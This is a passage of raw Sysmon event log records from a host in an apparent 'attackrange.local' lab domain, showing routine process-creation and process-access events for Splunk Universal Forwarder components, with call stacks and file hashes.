Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009613Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:47.025{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-93DB-6005-E104-00000000A301}4536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009612Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:47.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009611Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:57:47.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009610Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:47.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009609Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:57:47.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009608Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:47.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009607Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:57:47.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009606Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:47.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009605Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:57:47.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009604Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:47.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009603Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:47.025{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-93DB-6005-E104-00000000A301}4536C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009602Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:47.025{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-93DB-6005-E104-00000000A301}4536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009601Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:47.025{59A5CD1D-93DB-6005-E104-00000000A301}4536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009642Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.837{59A5CD1D-93DC-6005-E304-00000000A301}8644724C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009641Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.697{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-93DC-6005-E304-00000000A301}864C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009640Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:57:48.697{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009639Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.697{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009638Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:57:48.697{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009637Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.697{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009636Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:57:48.697{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009635Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.697{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009634Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:57:48.697{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009633Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.697{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009632Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:57:48.697{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009631Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.697{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-93DC-6005-E304-00000000A301}864C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009630Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.697{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-93DC-6005-E304-00000000A301}864C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009629Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.697{59A5CD1D-93DC-6005-E304-00000000A301}864C:\Program 